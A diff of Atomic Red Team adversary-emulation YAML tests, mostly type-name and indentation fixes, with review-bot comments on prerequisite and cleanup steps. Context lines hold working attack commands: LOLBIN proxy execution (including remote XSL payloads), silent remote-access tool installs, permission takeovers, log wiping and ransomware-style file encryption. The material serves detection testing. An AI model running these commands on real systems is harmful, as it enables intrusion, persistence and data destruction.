@@ -10,11 +10,11 @@ atomic_tests: input_arguments: process_id: description: PID of process receiving injection - type: String + type: string default: "1000" dll_payload: description: DLL to inject - type: Path + type: path default: PathToAtomicsFolder\T1218\src\x64\T1218.dll dependency_executor_name: powershell dependencies: @@ -39,7 +39,7 @@ atomic_tests: input_arguments: dll_payload: description: DLL to execute - type: Path + type: path default: PathToAtomicsFolder\T1218\src\Win32\T1218-2.dll dependency_executor_name: powershell dependencies: @@ -65,7 +65,7 @@ atomic_tests: input_arguments: inf_to_execute: description: Local location of inf file - type: String + type: string default: PathToAtomicsFolder\T1218\src\Infdefaultinstall.inf dependency_executor_name: powershell dependencies: @@ -85,14 +85,14 @@ atomic_tests: description: | Emulates attack via documents through protocol handler in Microsoft Office. On successful execution you should see Microsoft Word launch a blank file. supported_platforms: - - windows + - windows input_arguments: remote_url: description: url to document - type: Url + type: url default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218/src/T1218Test.docx - dependency_executor_name: powershell - dependencies: + dependency_executor_name: powershell + dependencies: - description: | Microsoft Word must be installed prereq_command: | 
@@ -113,28 +113,28 @@ atomic_tests:
 description: |
 Emulates attack with Microsoft.Workflow.Compiler.exe running a .Net assembly that launches calc.exe
 supported_platforms:
- - windows
+ - windows
 input_arguments:
 xml_payload:
 description: XML to execution
- type: Path
+ type: path
 default: PathToAtomicsFolder\T1218\src\T1218.xml
 mwcpath:
 description: Default location of Microsoft.Workflow.Compiler.exe
- type: Path
+ type: path
 default: C:\Windows\Microsoft.NET\Framework64\v4.0.30319
 mwcname:
 description: Default name of microsoft.workflow.compiler.exe
- type: Path
+ type: path
 default: microsoft.workflow.compiler.exe
- dependency_executor_name: powershell
- dependencies:
- - description: |
- .Net must be installed for this test to work correctly.
- prereq_command: |
- if (Test-Path #{mwcpath}\#{mwcname} ) {exit 0} else {exit 1}
- get_prereq_command: |
- write-host ".Net must be installed for this test to work correctly."
+ dependency_executor_name: powershell
+ dependencies:
+ - description: |
+ .Net must be installed for this test to work correctly.
+ prereq_command: |
+ if (Test-Path #{mwcpath}\#{mwcname} ) {exit 0} else {exit 1}
+ get_prereq_command: |
+ write-host ".Net must be installed for this test to work correctly."
 executor:
 command: |
 #{mwcpath}\#{mwcname} "#{xml_payload}" output.txt
@@ -145,33 +145,33 @@ atomic_tests:
 description: |
 Emulates attack with a renamed Microsoft.Workflow.Compiler.exe running a .Net assembly that launches calc.exe
 supported_platforms:
- - windows
+ - windows
 input_arguments:
 xml_payload:
 description: XML to execution
- type: Path
+ type: path
 default: PathToAtomicsFolder\T1218\src\T1218.xml
 renamed_binary:
 description: renamed Microsoft.Workflow.Compiler
- type: Path
+ type: path
 default: PathToAtomicsFolder\T1218\src\svchost.exe
 mwcpath:
 description: Default location of Microsoft.Workflow.Compiler.exe
- type: Path
+ type: path
 default: C:\Windows\Microsoft.NET\Framework64\v4.0.30319
 mwcname:
 description: Default name of microsoft.workflow.compiler.exe
- type: Path
+ type: path
 default: microsoft.workflow.compiler.exe
- dependency_executor_name: powershell
- dependencies:
- - description: |
- .Net must be installed for this test to work correctly.
- prereq_command: |
- Copy-Item #{mwcpath}\#{mwcname} "#{renamed_binary}" -Force
- if (Test-Path "#{renamed_binary}") {exit 0} else {exit 1}
- get_prereq_command: |
- write-host "you need to rename workflow complier before you run this test"
+ dependency_executor_name: powershell
+ dependencies:
+ - description: |
+ .Net must be installed for this test to work correctly.
+ prereq_command: |
+ Copy-Item #{mwcpath}\#{mwcname} "#{renamed_binary}" -Force
+ if (Test-Path "#{renamed_binary}") {exit 0} else {exit 1}
+ get_prereq_command: |
+ write-host "you need to rename workflow complier before you run this test"
 executor:
 command: |
 #{renamed_binary} #{xml_payload} output.txt
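Review bot: In the renamed Microsoft.Workflow.Compiler.exe test, `prereq_command` does the provisioning (`Copy-Item #{mwcpath}\#{mwcname} "#{renamed_binary}" -Force`) while `get_prereq_command` only prints a message, so the prerequisite check has a side effect on every run and a failed copy can never be repaired by the framework's own provisioning step. Swap the roles: make `prereq_command` the pure test `if (Test-Path "#{renamed_binary}") {exit 0} else {exit 1}` and move the `Copy-Item` line into `get_prereq_command`. The dependency description ".Net must be installed for this test to work correctly." should then say that the renamed copy is what is being checked, and "complier" in the write-host string is a typo. The re-indentation in this hunk is otherwise fine.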
@@ -185,20 +185,20 @@ atomic_tests: One of the PowerShell functions called by RemoteFXvGPUDisablement.exe is Get-VMRemoteFXPhysicalVideoAdapter, a part of the Hyper-V module. This atomic test influences RemoteFXvGPUDisablement.exe to execute custom PowerShell code by using a technique referred to as "PowerShell module load-order hijacking" where a module containing, in this case, an implementation of the Get-VMRemoteFXPhysicalVideoAdapter is loaded first by way of introducing a temporary module into the first directory listed in the %PSModulePath% environment variable or within a user-specified module directory outside of %PSModulePath%. Upon execution the temporary module is deleted. Invoke-ATHRemoteFXvGPUDisablementCommand is used in this test to demonstrate how a PowerShell host executable can be directed to user-supplied PowerShell code without needing to supply anything at the command-line. PowerShell code execution is triggered when supplying the "Disable" argument to RemoteFXvGPUDisablement.exe. - + The Invoke-ATHRemoteFXvGPUDisablementCommand function outputs all relevant execution-related artifacts. - + Reference: https://github.com/redcanaryco/AtomicTestHarnesses/blob/master/TestHarnesses/T1218_SignedBinaryProxyExecution/InvokeRemoteFXvGPUDisablementCommand.ps1 supported_platforms: - windows input_arguments: module_name: description: Specifies a temporary module name to use. If -ModuleName is not supplied, a 16-character random temporary module name is used. A PowerShell module can have any name. Because Get-VMRemoteFXPhysicalVideoAdapter abuses module load order, a module name must be specified. - type: String + type: string default: foo module_path: description: Specifies an alternate, non-default PowerShell module path for RemoteFXvGPUDisablement.exe. If -ModulePath is not specified, the first entry in %PSModulePath% will be used. Typically, this is %USERPROFILE%\Documents\WindowsPowerShell\Modules. 
- type: String
+ type: string
 default: $PWD
 dependencies:
 - description: The AtomicTestHarnesses module must be installed and Invoke-ATHRemoteFXvGPUDisablementCommand must be exported in the module.
@@ -216,29 +216,29 @@ atomic_tests: description: | Emulates attack with a DiskShadow.exe (LOLBIN installed by default on Windows) being used to execute arbitrary commands Reference: https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/ supported_platforms: - - windows + - windows input_arguments: txt_payload: description: txt to execute - type: Path + type: path default: PathToAtomicsFolder\T1218\src\T1218.txt dspath: description: Default location of DiskShadow.exe - type: Path + type: path default: C:\Windows\System32\diskshadow.exe - dependency_executor_name: powershell - dependencies: - - description: txt file must exist on disk at specified location (#{txt_payload}) - prereq_command: | - if (Test-Path #{txt_payload}) {exit 0} else {exit 1} - get_prereq_command: | - New-Item -Type Directory (split-path #{txt_payload}) -ErrorAction ignore | Out-Null - Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/T1218.txt" -OutFile "#{txt_payload}" - - description: DiskShadow.exe must exist on disk at specified location (#{dspath}) - prereq_command: | - if (Test-Path #{dspath}) {exit 0} else {exit 1} - get_prereq_command: | - echo "DiskShadow.exe not found on disk at expected location" + dependency_executor_name: powershell + dependencies: + - description: txt file must exist on disk at specified location (#{txt_payload}) + prereq_command: | + if (Test-Path #{txt_payload}) {exit 0} else {exit 1} + get_prereq_command: | + New-Item -Type Directory (split-path #{txt_payload}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/T1218.txt" -OutFile "#{txt_payload}" + - description: DiskShadow.exe must exist on disk at specified location (#{dspath}) + prereq_command: | + if (Test-Path #{dspath}) {exit 0} else {exit 1} + get_prereq_command: | + echo "DiskShadow.exe not found on disk at expected 
location" executor: command: | #{dspath} -S #{txt_payload} @@ -254,7 +254,7 @@ atomic_tests: input_arguments: arbitrary_dll: description: Path of DLL to be loaded - type: String + type: string default: PathToAtomicsFolder\T1218\bin\calc.dll dependency_executor_name: powershell dependencies: @@ -270,7 +270,7 @@ atomic_tests: wuauclt.exe /UpdateDeploymentProvider #{arbitrary_dll} /RunHandlerComServer cleanup_command: |- taskkill /f /im calculator.exe > nul 2>&1 - name: command_prompt + name: command_prompt - name: Lolbin Gpscript logon option auto_generated_guid: 5bcda9cd-8e85-48fa-861d-b5a85d91d48c description: | @@ -278,7 +278,7 @@ atomic_tests: https://lolbas-project.github.io/lolbas/Binaries/Gpscript/ https://oddvar.moe/2018/04/27/gpscript-exe-another-lolbin-to-the-list/ supported_platforms: - - windows + - windows executor: command: | Gpscript /logon @@ -290,7 +290,7 @@ atomic_tests: https://lolbas-project.github.io/lolbas/Binaries/Gpscript/ https://oddvar.moe/2018/04/27/gpscript-exe-another-lolbin-to-the-list/ supported_platforms: - - windows + - windows executor: command: | Gpscript /startup @@ -303,15 +303,15 @@ atomic_tests: Poc from : https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/ Reference: https://lolbas-project.github.io/lolbas/Binaries/Ie4uinit/ supported_platforms: - - windows + - windows input_arguments: Path_inf: - description: Path to the cab file - type: Path - default: PathToAtomicsFolder\T1218\src\ieuinit.inf + description: Path to the cab file + type: path + default: PathToAtomicsFolder\T1218\src\ieuinit.inf Path_ie4uinit: description: Path to ie4uinit.exe - type: Path + type: path default: c:\windows\system32\ie4uinit.exe executor: command: | diff --git a/atomics/T1219/T1219.yaml b/atomics/T1219/T1219.yaml index a96b1460..73c6caa9 100644 --- a/atomics/T1219/T1219.yaml +++ b/atomics/T1219/T1219.yaml 
@@ -82,7 +82,7 @@ atomic_tests: $installer = "C:\Users\$env:username\Downloads\ScreenConnect.msi" Invoke-WebRequest -OutFile $installer "https://d1kuyuqowve5id.cloudfront.net/ScreenConnect_21.11.4237.7885_Release.msi" msiexec /i $installer /qn - cleanup_command: | + cleanup_command: | $installer = "C:\Users\$env:username\Downloads\ScreenConnect.msi" msiexec /x $installer /qn name: powershell @@ -97,7 +97,7 @@ atomic_tests: input_arguments: Ammyy_Admin_Path: description: Path of Ammyy Admin executable - type: Path + type: path default: $env:temp\ammyy.exe dependency_executor_name: powershell dependencies: @@ -110,10 +110,10 @@ atomic_tests: executor: command: | Start-Process #{Ammyy_Admin_Path} - cleanup_command: | + cleanup_command: | Stop-Process -Name "Ammyy" -force -erroraction silentlycontinue name: powershell - elevation_required: True + elevation_required: true - name: RemotePC Software Execution auto_generated_guid: fbff3f1f-b0bf-448e-840f-7e1687affdce description: | @@ -124,7 +124,7 @@ atomic_tests: input_arguments: RemotePC_Path: description: Path of RemotePC executable - type: Path + type: path default: $env:temp\RemotePC.exe dependency_executor_name: powershell dependencies: @@ -137,7 +137,7 @@ atomic_tests: executor: command: | Start-Process #{RemotePC_Path} - cleanup_command: | + cleanup_command: | Unregister-ScheduledTask -TaskName "RemotePC" -Confirm:$False -ErrorAction SilentlyContinue Unregister-ScheduledTask -TaskName "RPCServiceHealthCheck" -Confirm:$False -ErrorAction SilentlyContinue Unregister-ScheduledTask -TaskName "ServiceMonitor" -Confirm:$False -ErrorAction SilentlyContinue @@ -149,7 +149,7 @@ atomic_tests: Stop-Process -Name "RemotePCService" -force -erroraction silentlycontinue Stop-Process -Name "RPCService" -force -erroraction silentlycontinue name: powershell - elevation_required: True + elevation_required: true - name: NetSupport - RAT Execution auto_generated_guid: ecca999b-e0c8-40e8-8416-ad320b146a75 description: | 
@@ -158,8 +158,8 @@ atomic_tests: - windows input_arguments: NetSupport_Path: - description: Path to the NetSupport executable. - type: Path + description: Path to the NetSupport executable. + type: path default: $env:temp\T1219_NetSupport.exe dependency_executor_name: powershell dependencies: @@ -172,20 +172,20 @@ atomic_tests: executor: command: | Start-Process #{NetSupport_Path} -ArgumentList "/S /v/qn" - cleanup_command: | + cleanup_command: | Stop-Process -Name "client32" -force -erroraction silentlycontinue name: powershell - elevation_required: True + elevation_required: true - name: UltraViewer - RAT Execution auto_generated_guid: 19acf63b-55c4-4b6a-8552-00a8865105c8 description: | - A recent trend by threat actors, once a foothold is established, maintain long term persistence using third party remote services such as UltraViewer to provide the operator with access to the network using legitimate services. + A recent trend by threat actors, once a foothold is established, maintain long term persistence using third party remote services such as UltraViewer to provide the operator with access to the network using legitimate services. supported_platforms: - windows input_arguments: UltraViewer_Path: - description: Path to the UltraViewer executable. - type: Path + description: Path to the UltraViewer executable. + type: path default: $env:temp\T1219_UltraViewer.exe dependency_executor_name: powershell dependencies: @@ -199,10 +199,10 @@ atomic_tests: command: | Start-Process -Wait -FilePath "#{UltraViewer_Path}" -Argument "/silent" -PassThru Start-Process 'C:\Program Files (x86)\UltraViewer\UltraViewer_Desktop.exe' - cleanup_command: | + cleanup_command: | Stop-Process -Name "UltraViewer_Desktop" -Force -ErrorAction SilentlyContinue name: powershell - elevation_required: True + elevation_required: true - name: UltraVNC Execution auto_generated_guid: 42e51815-a6cc-4c75-b970-3f0ff54b610e description: | 
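Review bot: The NetSupport and UltraViewer tests install a remote-access agent silently (`Start-Process #{NetSupport_Path} -ArgumentList "/S /v/qn"` and `Start-Process -Wait -FilePath "#{UltraViewer_Path}" -Argument "/silent"`), but each `cleanup_command` only stops a process (`Stop-Process -Name "client32"`, `Stop-Process -Name "UltraViewer_Desktop"`), so the agent stays installed on the test host after the atomic finishes. Either run the product's own uninstaller in `cleanup_command` (its path is not visible in this hunk, so confirm it against the installer) or state plainly in the description that the software is left installed and must be removed by hand. The Ammyy and RemotePC tests in the preceding hunks follow the same pattern and would benefit from the same treatment.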
@@ -213,7 +213,7 @@ atomic_tests: input_arguments: UltraVNC_Viewer_Path: description: Path of UltraVNC Viewer executable - type: Path + type: path default: $env:ProgramFiles\'uvnc bvba\UltraVnc\vncviewer.exe' dependency_executor_name: powershell dependencies: @@ -222,12 +222,12 @@ atomic_tests: prereq_command: | if (Test-Path #{UltraVNC_Viewer_Path}) {exit 0} else {exit 1} get_prereq_command: | - Start-BitsTransfer -Source "https://www.uvnc.eu/download/1381/UltraVNC_1_3_81_X64_Setup.exe" -Destination $env:temp\vncsetup.exe -dynamic - start-process $env:temp\vncsetup.exe /silent + Start-BitsTransfer -Source "https://www.uvnc.eu/download/1381/UltraVNC_1_3_81_X64_Setup.exe" -Destination $env:temp\vncsetup.exe -dynamic + start-process $env:temp\vncsetup.exe /silent executor: command: | Start-Process #{UltraVNC_Viewer_Path} cleanup_command: | Stop-Process -Name "vncviewer" -force -erroraction silentlycontinue name: powershell - elevation_required: True + elevation_required: true diff --git a/atomics/T1220/T1220.yaml b/atomics/T1220/T1220.yaml index 84c442e4..18e8357c 100644 --- a/atomics/T1220/T1220.yaml +++ b/atomics/T1220/T1220.yaml @@ -13,15 +13,15 @@ atomic_tests: input_arguments: xmlfile: description: Location of the test XML file on the local filesystem. - type: Path + type: path default: PathToAtomicsFolder\T1220\src\msxslxmlfile.xml xslfile: description: Location of the test XSL script file on the local filesystem. - type: Path + type: path default: PathToAtomicsFolder\T1220\src\msxslscript.xsl msxsl_exe: description: Location of the MSXSL executable. - type: Path + type: path default: PathToAtomicsFolder\T1220\bin\msxsl.exe dependency_executor_name: powershell dependencies: @@ -48,7 +48,7 @@ atomic_tests: executor: command: | #{msxsl_exe} #{xmlfile} #{xslfile} - cleanup_command: | + cleanup_command: | del #{msxsl_exe} >nul 2>&1 name: command_prompt - name: MSXSL Bypass using remote files 
@@ -63,15 +63,15 @@ atomic_tests: input_arguments: xmlfile: description: Remote location (URL) of the test XML file. - type: Url + type: url default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslxmlfile.xml xslfile: description: Remote location (URL) of the test XSL script file. - type: Url + type: url default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslscript.xsl msxsl_exe: description: Location of the MSXSL executable. - type: Path + type: path default: PathToAtomicsFolder\T1220\bin\msxsl.exe dependency_executor_name: powershell dependencies: @@ -84,7 +84,7 @@ atomic_tests: executor: command: | #{msxsl_exe} #{xmlfile} #{xslfile} - cleanup_command: | + cleanup_command: | del -Path #{msxsl_exe} >nul 2>&1 name: command_prompt - name: WMIC bypass using local XSL file @@ -96,11 +96,11 @@ atomic_tests: input_arguments: wmic_command: description: WMI command to execute using wmic.exe - type: String + type: string default: process list local_xsl_file: description: Location of the test XSL script file on the local filesystem. - type: Path + type: path default: PathToAtomicsFolder\T1220\src\wmicscript.xsl dependency_executor_name: powershell dependencies: @@ -124,11 +124,11 @@ atomic_tests: input_arguments: remote_xsl_file: description: Remote location of an XSL payload. - type: Url + type: url default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl wmic_command: description: WMI command to execute using wmic.exe - type: String + type: string default: process list executor: command: | diff --git a/atomics/T1221/T1221.yaml b/atomics/T1221/T1221.yaml index 3c554c5f..3e90c35f 100644 --- a/atomics/T1221/T1221.yaml +++ b/atomics/T1221/T1221.yaml 
@@ -13,7 +13,7 @@ atomic_tests:
 input_arguments:
 docx_file:
 description: Location of the test docx file on the local filesystem.
- type: Path
+ type: path
 default: PathToAtomicsFolder\T1221\src\Calculator.docx
 dependency_executor_name: powershell
 dependencies:
diff --git a/atomics/T1222.001/T1222.001.yaml b/atomics/T1222.001/T1222.001.yaml
index d8dfe3d5..8a72e29a 100644
--- a/atomics/T1222.001/T1222.001.yaml
+++ b/atomics/T1222.001/T1222.001.yaml
@@ -11,7 +11,7 @@ atomic_tests:
 input_arguments:
 file_folder_to_own:
 description: Path of the file or folder for takeown to take ownership.
- type: Path
+ type: path
 default: '%temp%\T1222.001_takeown_folder'
 dependency_executor_name: command_prompt
 dependencies:
@@ -38,11 +38,11 @@ atomic_tests:
 input_arguments:
 file_or_folder:
 description: Path of the file or folder to change permissions.
- type: Path
+ type: path
 default: '%temp%\T1222.001_cacls'
 user_or_group:
 description: User or group to allow full control
- type: String
+ type: string
 default: Everyone
 dependency_executor_name: command_prompt
 dependencies:
@@ -68,7 +68,7 @@ atomic_tests:
 input_arguments:
 file_or_folder:
 description: Path of the file or folder remove attribute.
- type: Path
+ type: path
 default: '%temp%\T1222.001_attrib'
 dependency_executor_name: command_prompt
 dependencies:
@@ -96,7 +96,7 @@ atomic_tests:
 input_arguments:
 file_or_folder:
 description: Path of the files to hide.
- type: Path
+ type: path
 default: '%temp%\T1222.001_attrib_2'
 executor:
 command: |
@@ -120,11 +120,11 @@ atomic_tests:
 input_arguments:
 path:
 description: Path of folder to recursively set permissions on
- type: Path
+ type: path
 default: 'C:\Users\Public\*'
 file_path:
 description: Path of folder permission back
- type: Path
+ type: path
 default: '%temp%\T1222.001-folder-perms-backup.txt'
 dependency_executor_name: command_prompt
 dependencies:
@@ -139,4 +139,4 @@ atomic_tests: cleanup_command: | icacls '#{path}' /restore #{file_path} /q >nul 2>&1 name: command_prompt - elevation_required: true + elevation_required: true diff --git a/atomics/T1222.002/T1222.002.yaml b/atomics/T1222.002/T1222.002.yaml index f0686088..e325170c 100644 --- a/atomics/T1222.002/T1222.002.yaml +++ b/atomics/T1222.002/T1222.002.yaml @@ -11,11 +11,11 @@ atomic_tests: input_arguments: numeric_mode: description: Specified numeric mode value - type: Integer + type: integer default: 755 file_or_folder: description: Path of the file or folder - type: Path + type: path default: /tmp/AtomicRedTeam/atomics/T1222.002 executor: command: | @@ -31,11 +31,11 @@ atomic_tests: input_arguments: symbolic_mode: description: Specified symbolic mode value - type: String + type: string default: a+w file_or_folder: description: Path of the file or folder - type: Path + type: path default: /tmp/AtomicRedTeam/atomics/T1222.002 executor: command: | @@ -51,11 +51,11 @@ atomic_tests: input_arguments: numeric_mode: description: Specified numeric mode value - type: Integer + type: integer default: 755 file_or_folder: description: Path of the file or folder - type: Path + type: path default: /tmp/AtomicRedTeam/atomics/T1222.002 executor: command: | @@ -71,11 +71,11 @@ atomic_tests: input_arguments: symbolic_mode: description: Specified symbolic mode value - type: String + type: string default: a+w file_or_folder: description: Path of the file or folder - type: Path + type: path default: /tmp/AtomicRedTeam/atomics/T1222.002 executor: command: | @@ -91,15 +91,15 @@ atomic_tests: input_arguments: owner: description: Username of desired owner - type: String + type: string default: root file_or_folder: description: Path of the file or folder - type: Path + type: path default: /tmp/AtomicRedTeam/atomics/T1222.002/T1222.002.yaml group: description: Group name of desired group - type: String + type: string default: root executor: command: | 
@@ -115,15 +115,15 @@ atomic_tests:
 input_arguments:
 owner:
 description: Username of desired owner
- type: String
+ type: string
 default: root
 file_or_folder:
 description: Path of the file or folder
- type: Path
+ type: path
 default: /tmp/AtomicRedTeam/atomics/T1222.002
 group:
 description: Group name of desired group
- type: String
+ type: string
 default: root
 executor:
 command: |
@@ -139,11 +139,11 @@ atomic_tests:
 input_arguments:
 owner:
 description: Username of desired owner
- type: String
+ type: string
 default: root
 file_or_folder:
 description: Path of the file or folder
- type: Path
+ type: path
 default: /tmp/AtomicRedTeam/atomics/T1222.002/T1222.002.yaml
 executor:
 command: |
@@ -159,11 +159,11 @@ atomic_tests:
 input_arguments:
 owner:
 description: Username of desired owner
- type: String
+ type: string
 default: root
 file_or_folder:
 description: Path of the file or folder
- type: Path
+ type: path
 default: /tmp/AtomicRedTeam/atomics/T1222.002
 executor:
 command: |
@@ -180,7 +180,7 @@ atomic_tests:
 input_arguments:
 file_to_modify:
 description: Path of the file
- type: Path
+ type: path
 default: /var/spool/cron/root
 executor:
 command: |
@@ -196,23 +196,23 @@ atomic_tests:
 input_arguments:
 source_file:
 description: Path of c source file
- type: Path
+ type: path
 default: PathToAtomicsFolder/T1222.002/src/T1222.002.c
 compiled_file:
 description: Path of compiled file
- type: Path
+ type: path
 default: /tmp/T1222002
 dependency_executor_name: sh
 dependencies:
 - description: |
- Compile the script from (#{source_file}). Destination is #{compiled_file}
+ Compile the script from (#{source_file}). Destination is #{compiled_file}
 prereq_command: |
- gcc #{source_file} -o #{compiled_file}
+ gcc #{source_file} -o #{compiled_file}
 get_prereq_command: |
- gcc #{source_file} -o #{compiled_file}
+ gcc #{source_file} -o #{compiled_file}
 executor:
 command: |
- #{compiled_file} /tmp/ T1222002
+ #{compiled_file} /tmp/ T1222002
 name: sh
 - name: Chown through c script
 auto_generated_guid: 18592ba1-5f88-4e3c-abc8-ab1c6042e389
@@ -224,22 +224,22 @@ atomic_tests:
 input_arguments:
 source_file:
 description: Path of c source file
- type: Path
+ type: path
 default: PathToAtomicsFolder/T1222.002/src/chown.c
 compiled_file:
 description: Path of compiled file
- type: Path
+ type: path
 default: /tmp/T1222002own
 dependency_executor_name: sh
 dependencies:
 - description: |
- Compile the script from (#{source_file}). Destination is #{compiled_file}
+ Compile the script from (#{source_file}). Destination is #{compiled_file}
 prereq_command: |
- gcc #{source_file} -o #{compiled_file}
+ gcc #{source_file} -o #{compiled_file}
 get_prereq_command: |
- gcc #{source_file} -o #{compiled_file}
+ gcc #{source_file} -o #{compiled_file}
 executor:
 command: |
- sudo #{compiled_file} #{source_file}
+ sudo #{compiled_file} #{source_file}
 name: sh
 elevation_required: true
diff --git a/atomics/T1482/T1482.yaml b/atomics/T1482/T1482.yaml
index 6a854918..c45b1389 100644
--- a/atomics/T1482/T1482.yaml
+++ b/atomics/T1482/T1482.yaml
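Review bot: In both T1222.002 C-program tests the `prereq_command` is `gcc #{source_file} -o #{compiled_file}`, i.e. the prerequisite check compiles the binary instead of testing for it, so every invocation rebuilds the executable and a missing compiler shows up as a confusing check failure rather than as a provisioning step that can be reported separately. Make the check side-effect free, `if [ -x "#{compiled_file}" ]; then exit 0; else exit 1; fi`, and keep the `gcc` line only in `get_prereq_command`, where it already is. The description "Compile the script from (#{source_file})" refers to a C source file, so "program" or "source" reads more accurately than "script". The indentation changes in these two hunks themselves look correct.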
@@ -64,7 +64,7 @@ atomic_tests: name: powershell - name: Adfind - Enumerate Active Directory OUs auto_generated_guid: d1c73b96-ab87-4031-bad8-0e1b3b8bf3ec - description: | + description: | Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory OUs reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html supported_platforms: @@ -72,7 +72,7 @@ atomic_tests: input_arguments: adfind_path: description: Path to the AdFind executable - type: Path + type: path default: PathToAtomicsFolder\T1087.002\src\AdFind.exe dependency_executor_name: powershell dependencies: @@ -88,7 +88,7 @@ atomic_tests: name: command_prompt - name: Adfind - Enumerate Active Directory Trusts auto_generated_guid: 15fe436d-e771-4ff3-b655-2dca9ba52834 - description: | + description: | Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Trusts reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html supported_platforms: @@ -96,7 +96,7 @@ atomic_tests: input_arguments: adfind_path: description: Path to the AdFind executable - type: Path + type: path default: PathToAtomicsFolder\T1087.002\src\AdFind.exe dependency_executor_name: powershell dependencies: @@ -144,11 +144,11 @@ atomic_tests: input_arguments: trufflesnout_path: description: Path to the TruffleSnout executable - type: Path + type: path default: PathToAtomicsFolder\T1482\src\TruffleSnout.exe domain: description: Domain name to search on - type: String + type: string default: '%userdomain%' dependency_executor_name: powershell dependencies: 
diff --git a/atomics/T1484.002/T1484.002.yaml b/atomics/T1484.002/T1484.002.yaml index b42136a7..9b595ee8 100644 --- a/atomics/T1484.002/T1484.002.yaml +++ b/atomics/T1484.002/T1484.002.yaml @@ -14,15 +14,15 @@ atomic_tests: input_arguments: azure_username: description: Username of a privileged Azure AD account such as External Identity Provider Administrator or Global Administrator roles - type: String + type: string default: bruce.wayne@contosocloud.com azure_password: description: Password of azure_username - type: String + type: string default: iamthebatman domain_name: description: Malicious federated domain name - type: String + type: string default: contoso.com dependency_executor_name: powershell dependencies: @@ -60,7 +60,7 @@ atomic_tests: Write-Host "Error: domain ""#{domain_name}"" not verified" exit 1 } - + if ($domain.AuthenticationType -eq "Federated") { Write-Host "Error: domain ""#{domain_name}"" already federated. Try with a different domain or re-create it before." exit 1 @@ -93,5 +93,3 @@ atomic_tests: Remove-AzureADDomain -Name "#{domain_name}" -ErrorAction Ignore } catch {} name: powershell - - diff --git a/atomics/T1485/T1485.yaml b/atomics/T1485/T1485.yaml index 1bdf710b..39b83d83 100644 --- a/atomics/T1485/T1485.yaml +++ b/atomics/T1485/T1485.yaml @@ -11,11 +11,11 @@ atomic_tests: input_arguments: sdelete_exe: description: Path of sdelete executable - type: Path + type: path default: $env:TEMP\Sdelete\sdelete.exe file_to_delete: description: Path of file to delete - type: Path + type: path default: $env:TEMP\T1485.txt dependency_executor_name: powershell dependencies: @@ -43,11 +43,11 @@ atomic_tests: input_arguments: overwrite_source: description: Path of data source to overwrite with - type: Path + type: path default: /dev/zero file_to_overwrite: description: Path of file to overwrite and remove - type: Path + type: path default: /var/log/syslog executor: command: | 
@@ -61,8 +61,8 @@ atomic_tests: https://www.cybereason.com/blog/cybereason-vs.-ransomexx-ransomware https://support.microsoft.com/en-us/topic/cipher-exe-security-tool-for-the-encrypting-file-system-56c85edd-85cf-ac07-f2f7-ca2d35dab7e4 supported_platforms: - - windows - executor: + - windows + executor: command: | cipher.exe /w:C: name: command_prompt diff --git a/atomics/T1486/T1486.yaml b/atomics/T1486/T1486.yaml index 411fefe8..1c4c5361 100644 --- a/atomics/T1486/T1486.yaml +++ b/atomics/T1486/T1486.yaml @@ -7,32 +7,32 @@ atomic_tests: description: | Uses gpg to encrypt a file supported_platforms: - - linux + - linux input_arguments: pwd_for_encrypted_file: description: the password that you want for the encrypted file - type: String + type: string default: passwd encrypted_file_path: description: path to the encrypted file - type: Path + type: path default: /tmp/passwd.gpg input_file_path: description: path to the file that you want to encrypt - type: Path + type: path default: /etc/passwd encryption_alg: description: encryption algorithm of the file - type: String + type: string default: AES-256 dependency_executor_name: bash dependencies: - - description: | - Finds where gpg is located - prereq_command: | - which_gpg=`which gpg` - get_prereq_command: | - (which yum && yum -y install epel-release gpg)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y gpg) + - description: | + Finds where gpg is located + prereq_command: | + which_gpg=`which gpg` + get_prereq_command: | + (which yum && yum -y install epel-release gpg)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y gpg) executor: name: bash elevation_required: false 
@@ -47,27 +47,27 @@ atomic_tests: description: | Uses 7z to encrypt a file supported_platforms: - - linux + - linux input_arguments: pwd_for_encrypted_file: description: the password that you want for the encrypted file - type: String + type: string default: passwd encrypted_file_path: description: path to the encrypted file - type: Path + type: path default: /tmp/passwd.zip input_file_path: description: path to the file that you want to encrypt - type: Path + type: path default: /etc/passwd dependency_executor_name: bash dependencies: - - description: | - Finds where 7z is located - prereq_command: | - which_7z=`which 7z` - get_prereq_command: | + - description: | + Finds where 7z is located + prereq_command: | + which_7z=`which 7z` + get_prereq_command: | executor: name: bash elevation_required: false 
@@ -81,36 +81,37 @@ atomic_tests: - name: Encrypt files using ccrypt (Linux) auto_generated_guid: 08cbf59f-85da-4369-a5f4-049cffd7709f description: | - Attempts to encrypt data on target systems as root to simulate an inturruption authentication to target system. If root permissions are not available then attempts to encrypt data within user's home directory. + Attempts to encrypt data on target systems as root to simulate an inturruption authentication to target system. If root permissions are not available then attempts to encrypt data within user's home directory. supported_platforms: - - linux + - linux input_arguments: cped_file_path: description: path where you want your copied file to be - type: Path + type: path default: /tmp/passwd root_input_file_path: - description: path to the file that you want to be encrypted if you are root user - type: Path + description: path to the file that you want to be encrypted if you are root + user + type: path default: /etc/passwd user_input_file_path: description: path to file that you want to be encrypted if you are normal user - type: Path + type: path default: ~/.bash_history impact_command: description: command to show impact of encryption - type: String + type: string default: sudo su dependency_executor_name: bash dependencies: - - description: | - Finds where ccencrypt and ccdecrypt is located and copies input file - 